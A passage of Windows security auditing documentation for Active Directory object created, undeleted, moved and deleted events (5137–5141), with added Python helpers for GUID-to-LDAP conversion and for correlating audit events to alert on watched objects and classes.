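    if len(parts) != 5:
        raise ValueError("expected a 5-group GUID string without braces")
    # Steps 1-2: reverse the byte order inside the first three groups.
    swapped = [bytes.fromhex(p)[::-1].hex() for p in parts[:3]]
    # Steps 3-4: append the last two groups unchanged and drop the dashes.
    hexstr = "".join(swapped + parts[3:])
    # Step 5: split into bytes and prefix each byte with a backslash.
    return "".join("\\" + hexstr[i:i + 2] for i in range(0, len(hexstr), 2))


def objectguid_filter(guid_text: str) -> str:
    """The LDAP filter from the page, matching one object by objectGUID."""
    return f"(&(objectClass=*)(objectGUID={guid_to_ldap_bytes(guid_text)}))"


def ldap_bytes_to_guid(escaped: str) -> str:
    """Inverse direction: turn a \\b5\\4a... value back into display form."""
    hexstr = escaped.replace("\\", "")
    if len(hexstr) != 32:
        raise ValueError("objectGUID must be exactly 16 bytes")
    return str(uuid.UUID(bytes_le=bytes.fromhex(hexstr)))


if __name__ == "__main__":
    print(objectguid_filter(PAGE_GUID))
```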
Class [Type = UnicodeString]: class of the object that was created. Some of the common Active Directory
object classes:
container – for containers.
user – for users.
group – for groups.
domainDNS – for domain object.
groupPolicyContainer – for group policy objects.
For all possible values of this field open Active Directory Schema snap-in (see how to enable this
snap-in: https://technet.microsoft.com/library/Cc755885(v=WS.10).aspx) and navigate to Active
Directory Schema\Classes. Or use this document:
https://msdn.microsoft.com/library/cc221630.aspx
Operation:
Correlation ID [Type = GUID]: multiple modifications are often executed as one operation via LDAP. This
value allows you to correlate all the modification events that comprise the operation. Just look for other events
from current subcategory with the same Correlation ID, for example “5136: A directory service object was
modified.” and “5139: A directory service object was moved.”

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Application Correlation ID [Type = UnicodeString]: always has “-” value. Not in use.

Security Monitoring Recommendations
For 5137(S): A directory service object was created.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you need to monitor creation of Active Directory objects with specific classes, monitor for the Class field with
the specific class name. For example, we recommend that you monitor all creations of new group policy objects:
the groupPolicyContainer class.
You must set correct auditing access lists (SACLs) for specific classes within Active Directory container to
get 5137. There is no reason to audit all creation events for all types of Active Directory objects; find the
most important locations (organizational units, folders, etc.) and monitor for creation of specific classes only
(user, computer, group, etc.).
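The recommendations for 5136 (pair the “Value Deleted” and “Value Added” events by Correlation ID and watch specific DNs such as AdminSDHolder) and for 5137 (watch creations of specific classes such as groupPolicyContainer) as one added Python example; it is not Microsoft's code. The event XML is constructed in the page's layout with a constructed domain, and the mapping of the %%14674/%%14675 tokens to “Value Added”/“Value Deleted” is an assumption to verify against your own domain controllers.

```python
"""Pair 5136 halves by OpCorrelationID and flag watched-object changes,
plus 5137 creations of watched classes (added example, not from the page)."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumed mapping of the OperationType message-table tokens to the names the
# page uses; verify it against your DCs before relying on it.
OPERATION_TYPE = {"%%14674": "Value Added", "%%14675": "Value Deleted"}

# Objects and classes the page recommends watching (domain name constructed).
WATCHED_DNS = {"CN=AdminSDHolder,CN=System,DC=contoso,DC=local"}
WATCHED_CLASSES = {"groupPolicyContainer", "domainDNS"}


def make_event(event_id, data):
    """Build a Security-channel event in the page's XML layout (test fixture)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f"<Channel>Security</Channel><Computer>DC01.contoso.local</Computer>"
            f"</System><EventData>{fields}</EventData></Event>")


def parse_event(xml_text):
    """Return EventID plus every EventData field as one flat dict."""
    root = ET.fromstring(xml_text)
    rec = {"EventID": int(root.findtext("e:System/e:EventID", namespaces=NS))}
    for d in root.findall("e:EventData/e:Data", NS):
        rec[d.get("Name")] = d.text or ""
    return rec


def pair_modifications(events):
    """Merge the two 5136 halves of one change into {old, new} per attribute.

    The key is (Correlation ID, DN, attribute): the page says one LDAP
    operation shares a Correlation ID across all the events it produced.
    """
    changes = {}
    for ev in events:
        if ev["EventID"] != 5136:
            continue
        key = (ev["OpCorrelationID"], ev["ObjectDN"], ev["AttributeLDAPDisplayName"])
        rec = changes.setdefault(key, {
            "dn": ev["ObjectDN"], "attribute": ev["AttributeLDAPDisplayName"],
            "subject": f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}',
            "old": None, "new": None})
        op = OPERATION_TYPE.get(ev["OperationType"], ev["OperationType"])
        if op == "Value Deleted":
            rec["old"] = ev["AttributeValue"]
        elif op == "Value Added":
            rec["new"] = ev["AttributeValue"]
    return list(changes.values())


def findings(events):
    """Alerts for watched-DN modifications (5136) and watched-class creations (5137)."""
    alerts = []
    for ch in pair_modifications(events):
        if ch["dn"] in WATCHED_DNS:
            alerts.append(f'5136 {ch["subject"]} changed {ch["attribute"]} on '
                          f'{ch["dn"]}: {ch["old"]!r} -> {ch["new"]!r}')
    for ev in events:
        if ev["EventID"] == 5137 and ev.get("ObjectClass") in WATCHED_CLASSES:
            alerts.append(f'5137 {ev["SubjectDomainName"]}\\{ev["SubjectUserName"]} '
                          f'created {ev["ObjectClass"]} {ev["ObjectDN"]}')
    return alerts


# Constructed sample: one watched change (two 5136 halves), one unrelated
# 5136, and one 5137 for a new GPO (GPO GUID is a placeholder).
_COMMON = {"SubjectUserName": "dadmin", "SubjectDomainName": "CONTOSO",
           "DSName": "contoso.local", "DSType": "%%14676"}
_ADMINSD = {**_COMMON, "OpCorrelationID": "{11111111-0000-0000-0000-000000000001}",
            "ObjectDN": "CN=AdminSDHolder,CN=System,DC=contoso,DC=local",
            "ObjectClass": "container", "AttributeLDAPDisplayName": "description",
            "AttributeSyntaxOID": "2.5.5.12"}
SAMPLE_XML = [
    make_event(5136, {**_ADMINSD, "AttributeValue": "old text", "OperationType": "%%14675"}),
    make_event(5136, {**_ADMINSD, "AttributeValue": "new text", "OperationType": "%%14674"}),
    make_event(5136, {**_COMMON, "OpCorrelationID": "{11111111-0000-0000-0000-000000000002}",
                      "ObjectDN": "CN=Sergey,CN=Users,DC=contoso,DC=local",
                      "ObjectClass": "user", "AttributeLDAPDisplayName": "userAccountControl",
                      "AttributeSyntaxOID": "2.5.5.9", "AttributeValue": "512",
                      "OperationType": "%%14674"}),
    make_event(5137, {**_COMMON, "OpCorrelationID": "{11111111-0000-0000-0000-000000000003}",
                      "ObjectDN": "CN={PLACEHOLDER-GPO-GUID},CN=Policies,CN=System,DC=contoso,DC=local",
                      "ObjectClass": "groupPolicyContainer"}),
]
SAMPLE_EVENTS = [parse_event(x) for x in SAMPLE_XML]

if __name__ == "__main__":
    for line in findings(SAMPLE_EVENTS):
        print(line)
```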
5138(S): A directory service object was undeleted.
4/5/2019 • 5 minutes to read

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit Directory Service Changes
Event Description:
This event generates every time an Active Directory object is undeleted. It happens, for example, when an Active
Directory object was restored from the Active Directory Recycle Bin.
This event only generates if the container to which the Active Directory object was restored has a particular entry
in its SACL: the “Create” action, auditing for specific classes or objects. An example is the “Create User objects”
action.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5138</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-02T04:34:20.611082300Z" />
<EventRecordID>229336</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="544" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="OpCorrelationID">{3E2B5ECF-4C35-4C3F-8D82-B8D6F477D846}</Data>
<Data Name="AppCorrelationID">-</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3be49</Data>
<Data Name="DSName">contoso.local</Data>
<Data Name="DSType">%%14676</Data>
<Data Name="OldObjectDN">CN=Andrei\\0ADEL:53511188-bc98-4995-9d78-2d40143c9711,CN=Deleted Objects,DC=contoso,DC=local</Data>
<Data Name="NewObjectDN">CN=Andrei,CN=Users,DC=contoso,DC=local</Data>
<Data Name="ObjectGUID">{53511188-BC98-4995-9D78-2D40143C9711}</Data>
<Data Name="ObjectClass">user</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested that the object be undeleted or restored. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: name of account that requested that the object be undeleted or
restored.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Directory Service:
Name [Type = UnicodeString]: the name of an Active Directory domain, where the object was undeleted.
Type [Type = UnicodeString]: has “Active Directory Domain Services” value for this event.
Object:
Old DN [Type = UnicodeString]: old distinguished name of the undeleted object. It points to the Active Directory
Recycle Bin if the object was restored from it.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

New DN [Type = UnicodeString]: New distinguished name of undeleted object. The Active Directory
container to which the object was restored.
GUID [Type = GUID]: each Active Directory object has a globally unique identifier (GUID), which is a 128-bit
value that is unique not only in the enterprise but also across the world. GUIDs are assigned to every object
created by Active Directory. Each object's GUID is stored in its Object-GUID (objectGUID) property.
Active Directory uses GUIDs internally to identify objects. For example, the GUID is one of an object's
properties that is published in the global catalog. Searching the global catalog for a User object's GUID will
yield results if the user has an account somewhere in the enterprise. In fact, searching for any object by
Object-GUID might be the most reliable way of finding the object you want to find. The values of other
object properties can change, but the Object-GUID never changes. When an object is assigned a GUID, it
keeps that value for life.
Event Viewer automatically resolves the GUID field to the real object.
To translate this GUID, use the following procedure:
Perform the following LDAP search using the LDP.exe tool:
Base DN: CN=Schema,CN=Configuration,DC=XXX,DC=XXX
Filter: (&(objectClass=*)(objectGUID=GUID))
Perform the following operations with the GUID before using it in a search request:
1. We have this GUID to search for: a6b34ab5-551b-4626-b8ee-2b36b3ee6672
2. Take the first 3 sections: a6b34ab5-551b-4626.
3. For each of these 3 sections, invert the order of the bytes, like this: b54ab3a6-1b55-2646
4. Add the last 2 sections without transformation: b54ab3a6-1b55-2646-b8ee-2b36b3ee6672
5. Delete the hyphens: b54ab3a61b552646b8ee2b36b3ee6672
6. Divide the bytes with backslashes: \b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72
Filter example: (&(objectClass=*)(objectGUID=\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72))
Scope: Subtree
Attributes: objectGUID
Class [Type = UnicodeString]: class of the object that was undeleted. Some of the common Active Directory
object classes:
container – for containers.
user – for users.
group – for groups.
domainDNS – for domain object.
groupPolicyContainer – for group policy objects.
For all possible values of this field open Active Directory Schema snap-in (see how to enable this
snap-in: https://technet.microsoft.com/library/Cc755885(v=WS.10).aspx) and navigate to Active
Directory Schema\Classes. Or use this document:
https://msdn.microsoft.com/library/cc221630.aspx
Operation:
Correlation ID [Type = GUID]: multiple modifications are often executed as one operation via LDAP. This
value allows you to correlate all the modification events that comprise the operation. Just look for other events
from the current subcategory with the same Correlation ID, for example “5137: A directory service object was
created.” and “5139: A directory service object was moved.”

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Application Correlation ID [Type = UnicodeString]: always has “-” value. Not in use.

Security Monitoring Recommendations


For 5138(S): A directory service object was undeleted.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.
If you need to monitor undelete operations (restoration) of Active Directory objects with specific classes,
monitor for Class field with specific class name.
It may be a good idea to monitor all undelete events, because the operation is not performed very often.
Confirm that there is a reason for the object to be undeleted.
5139(S): A directory service object was moved.
4/5/2019 • 5 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Directory Service Changes
Event Description:
This event generates every time an Active Directory object is moved.
This event only generates if the destination object has a particular entry in its SACL: the “Create” action,
auditing for specific classes or objects. An example is the “Create Computer objects” action, auditing for the
organizational unit.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>5139</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>14081</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-28T06:26:07.019116600Z" />
    <EventRecordID>409532</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="600" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="OpCorrelationID">{67A42C05-A70D-4348-AF19-E883CB1FCA9C}</Data>
    <Data Name="AppCorrelationID">-</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x35867</Data>
    <Data Name="DSName">contoso.local</Data>
    <Data Name="DSType">%%14676</Data>
    <Data Name="OldObjectDN">CN=NewUser,CN=Builtin,DC=contoso,DC=local</Data>
    <Data Name="NewObjectDN">CN=NewUser,CN=Users,DC=contoso,DC=local</Data>
    <Data Name="ObjectGUID">{06713960-9CC3-4B5D-A594-35883A04F934}</Data>
    <Data Name="ObjectClass">user</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “move object” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “move object”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Directory Service:
Name [Type = UnicodeString]: the name of an Active Directory domain, where the object was moved.
Type [Type = UnicodeString]: has “Active Directory Domain Services” value for this event.
Object:
Old DN [Type = UnicodeString]: Old distinguished name of moved object.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

New DN [Type = UnicodeString]: New distinguished name of moved object. The Active Directory
container to which the object was moved.
GUID [Type = GUID]: each Active Directory object has a globally unique identifier (GUID), which is a 128-bit
value that is unique not only in the enterprise but also across the world. GUIDs are assigned to every object
created by Active Directory. Each object's GUID is stored in its Object-GUID (objectGUID) property.
Active Directory uses GUIDs internally to identify objects. For example, the GUID is one of an object's
properties that is published in the global catalog. Searching the global catalog for a User object's GUID will
yield results if the user has an account somewhere in the enterprise. In fact, searching for any object by
Object-GUID might be the most reliable way of finding the object you want to find. The values of other
object properties can change, but the Object-GUID never changes. When an object is assigned a GUID, it
keeps that value for life.
Event Viewer automatically resolves the GUID field to the real object.
To translate this GUID, use the following procedure:
Perform the following LDAP search using the LDP.exe tool:
Base DN: CN=Schema,CN=Configuration,DC=XXX,DC=XXX
Filter: (&(objectClass=*)(objectGUID=GUID))
Perform the following operations with the GUID before using it in a search request:
1. We have this GUID to search for: a6b34ab5-551b-4626-b8ee-2b36b3ee6672
2. Take the first 3 sections: a6b34ab5-551b-4626.
3. For each of these 3 sections, invert the order of the bytes, like this: b54ab3a6-1b55-2646
4. Add the last 2 sections without transformation: b54ab3a6-1b55-2646-b8ee-2b36b3ee6672
5. Delete the hyphens: b54ab3a61b552646b8ee2b36b3ee6672
6. Divide the bytes with backslashes: \b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72
Filter example: (&(objectClass=*)(objectGUID=\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72))
Scope: Subtree
Attributes: objectGUID
Class [Type = UnicodeString]: class of the object that was moved. Some of the common Active Directory
object classes:
container – for containers.
user – for users.
group – for groups.
domainDNS – for domain object.
groupPolicyContainer – for group policy objects.
For all possible values of this field open Active Directory Schema snap-in (see how to enable this
snap-in: https://technet.microsoft.com/library/Cc755885(v=WS.10).aspx) and navigate to Active
Directory Schema\Classes. Or use this document:
https://msdn.microsoft.com/library/cc221630.aspx
Operation:
Correlation ID [Type = GUID]: multiple modifications are often executed as one operation via LDAP. This
value allows you to correlate all the modification events that comprise the operation. Just look for other events
from the current subcategory with the same Correlation ID, for example “5137: A directory service object was
created.” and “5141: A directory service object was deleted.”

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Application Correlation ID [Type = UnicodeString]: always has “-” value. Not in use.

Security Monitoring Recommendations


For 5139(S): A directory service object was moved.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.
If you need to monitor movement of Active Directory objects with specific classes, monitor for Class field
with specific class name.
You must set correct auditing access lists (SACLs) for specific classes within Active Directory container to
get 5139. There is no reason to audit all movement events for all types of Active Directory objects, you
need to find the most important locations (organizational units, folders, etc.) and monitor for movement of
specific classes only to these locations (user, computer, group, etc.).
5141(S): A directory service object was deleted.
4/5/2019 • 5 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Directory Service Changes
Event Description:
This event generates every time an Active Directory object is deleted.
This event only generates if the deleted object has a particular entry in its SACL: the “Delete” action, auditing
for specific objects.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>5141</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>14081</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-28T18:48:06.792762900Z" />
    <EventRecordID>411118</EventRecordID>
    <Correlation />
    <Execution ProcessID="516" ThreadID="4092" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="OpCorrelationID">{C8A9000C-C618-4EE9-87FF-F852C0564F18}</Data>
    <Data Name="AppCorrelationID">-</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x32004</Data>
    <Data Name="DSName">contoso.local</Data>
    <Data Name="DSType">%%14676</Data>
    <Data Name="ObjectDN">CN=WIN2003,CN=Users,DC=contoso,DC=local</Data>
    <Data Name="ObjectGUID">{CA15B875-AFB1-4E5A-86B2-96E61DE09110}</Data>
    <Data Name="ObjectClass">computer</Data>
    <Data Name="TreeDelete">%%14679</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “delete object” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “delete object”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Directory Service:
Name [Type = UnicodeString]: the name of an Active Directory domain, where the object was deleted.
Type [Type = UnicodeString]: has “Active Directory Domain Services” value for this event.
Object:
DN [Type = UnicodeString]: distinguished name of the object that was deleted.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

GUID [Type = GUID]: each Active Directory object has a globally unique identifier (GUID), which is a 128-bit
value that is unique not only in the enterprise but also across the world. GUIDs are assigned to every object
created by Active Directory. Each object's GUID is stored in its Object-GUID (objectGUID) property.
Active Directory uses GUIDs internally to identify objects. For example, the GUID is one of an object's
properties that is published in the global catalog. Searching the global catalog for a User object's GUID will
yield results if the user has an account somewhere in the enterprise. In fact, searching for any object by
Object-GUID might be the most reliable way of finding the object you want to find. The values of other
object properties can change, but the Object-GUID never changes. When an object is assigned a GUID, it
keeps that value for life.
Event Viewer automatically resolves the GUID field to the real object. For deleted objects the GUID will be
resolved to the new destination of the object, for example:
OU=My\0ADEL:cc94c0d7-dd53-4061-9791-e53478dbbc3b,CN=Deleted Objects,DC=contoso,DC=local.
To translate this GUID, use the following procedure:
Perform the following LDAP search using the LDP.exe tool:
Base DN: CN=Schema,CN=Configuration,DC=XXX,DC=XXX
Filter: (&(objectClass=*)(objectGUID=GUID))
Perform the following operations with the GUID before using it in a search request:
1. We have this GUID to search for: a6b34ab5-551b-4626-b8ee-2b36b3ee6672
2. Take the first 3 sections: a6b34ab5-551b-4626.
3. For each of these 3 sections, invert the order of the bytes, like this: b54ab3a6-1b55-2646
4. Add the last 2 sections without transformation: b54ab3a6-1b55-2646-b8ee-2b36b3ee6672
5. Delete the hyphens: b54ab3a61b552646b8ee2b36b3ee6672
6. Divide the bytes with backslashes: \b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72
Filter example: (&(objectClass=*)(objectGUID=\b5\4a\b3\a6\1b\55\26\46\b8\ee\2b\36\b3\ee\66\72))
Scope: Subtree
Attributes: objectGUID
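The GUID translation procedure that is repeated under 5138, 5139 and 5141 above, carried out in code as an added example (it is not part of the original documentation): it reorders the bytes of a GUID the way the objectGUID attribute stores them, escapes them for an LDAP filter, and converts the attribute bytes back to display form. The sample GUID is the one the page uses; the \hh escaping follows RFC 4515.

```python
"""Convert an Active Directory GUID between its display form and the escaped
byte form that LDAP filters expect (added example, not from the original page).
Follows the LDP.exe steps described above for the 5138/5139/5141 GUID field."""
import uuid

SAMPLE_GUID = "a6b34ab5-551b-4626-b8ee-2b36b3ee6672"  # the GUID used in the page's walkthrough


def guid_to_ldap_bytes(guid_text: str) -> bytes:
    """Reorder a GUID's bytes the way objectGUID stores them.

    The first three sections (4, 2 and 2 bytes) are stored little-endian, so each
    of them is reversed; the last two sections are taken as written. Braces and
    upper-case hex, as Event Viewer shows them, are accepted by uuid.UUID.
    """
    raw = uuid.UUID(guid_text).bytes  # all 16 bytes in display (big-endian) order
    return raw[0:4][::-1] + raw[4:6][::-1] + raw[6:8][::-1] + raw[8:16]


def ldap_bytes_to_guid(data: bytes) -> str:
    """Inverse: the 16 raw objectGUID bytes back to lower-case display text."""
    if len(data) != 16:
        raise ValueError("objectGUID must be exactly 16 bytes")
    return str(uuid.UUID(bytes_le=data))


def escape_ldap_bytes(data: bytes) -> str:
    """Escape every byte as \\hh so it can appear inside an LDAP filter."""
    return "".join(f"\\{b:02x}" for b in data)


def object_guid_filter(guid_text: str) -> str:
    """Build the filter the page suggests entering in LDP.exe."""
    return f"(&(objectClass=*)(objectGUID={escape_ldap_bytes(guid_to_ldap_bytes(guid_text))}))"


def main() -> None:
    raw = guid_to_ldap_bytes(SAMPLE_GUID)
    # The manual steps above must agree with Python's own little-endian layout.
    assert raw == uuid.UUID(SAMPLE_GUID).bytes_le
    print("GUID:           ", SAMPLE_GUID)
    print("reordered bytes:", raw.hex())
    print("filter:         ", object_guid_filter(SAMPLE_GUID))
    print("round trip:     ", ldap_bytes_to_guid(raw))


if __name__ == "__main__":
    main()
```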
Class [Type = UnicodeString]: class of the object that was deleted. Some of the common Active Directory
object classes:
container – for containers.
user – for users.
group – for groups.
domainDNS – for domain object.
groupPolicyContainer – for group policy objects.
For all possible values of this field open Active Directory Schema snap-in (see how to enable this
snap-in: https://technet.microsoft.com/library/Cc755885(v=WS.10).aspx) and navigate to Active
Directory Schema\Classes. Or use this document:
https://msdn.microsoft.com/library/cc221630.aspx
Operation:
Tree Delete [Type = UnicodeString]:
Yes – “Delete Subtree” operation was performed. It happens, for example, if “Use Delete Subtree
server control” check box was checked during delete operation using Active Directory Users and
Computers management console.
No – delete operation was performed without “Delete Subtree” server control.
Correlation ID [Type = GUID]: multiple modifications are often executed as one operation via LDAP. This
value allows you to correlate all the modification events that comprise the operation. Just look for other events
from the current subcategory with the same Correlation ID, for example “5137: A directory service object was
created.” and “5139: A directory service object was moved.”

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Application Correlation ID [Type = UnicodeString]: always has “-” value. Not in use.

Security Monitoring Recommendations


For 5141(S): A directory service object was deleted.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you need to monitor deletion of Active Directory objects with specific classes, monitor for Class field with
specific class name. For example, we recommend that you monitor for group policy objects deletions:
groupPolicyContainer class.
If you need to monitor deletion of specific Active Directory objects, monitor for DN field with specific object
name. For example, if you have critical Active Directory objects which should not be deleted, monitor for
their deletion.
Audit Directory Service Replication
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Directory Service Replication determines whether the operating system generates audit events when
replication between two domain controllers begins and ends.
Event volume: Medium on domain controllers.

COMPUTER TYPE     | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | No              | No              | IF               | IF               | IF - Events in this subcategory typically have an informational purpose and it is difficult to detect any malicious activity using these events. It’s mainly used for Active Directory replication troubleshooting.
Member Server     | No              | No              | No               | No               | This subcategory makes sense only on domain controllers.
Workstation       | No              | No              | No               | No               | This subcategory makes sense only on domain controllers.

Events List:
4932(S): Synchronization of a replica of an Active Directory naming context has begun.
4933(S, F): Synchronization of a replica of an Active Directory naming context has ended.
4932(S): Synchronization of a replica of an Active Directory naming context has begun.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit Directory Service Replication


Event Description:
This event generates every time synchronization of a replica of an Active Directory naming context has begun.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4932</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>14082</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-02T02:06:03.814642100Z" />
    <EventRecordID>413689</EventRecordID>
    <Correlation />
    <Execution ProcessID="524" ThreadID="276" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
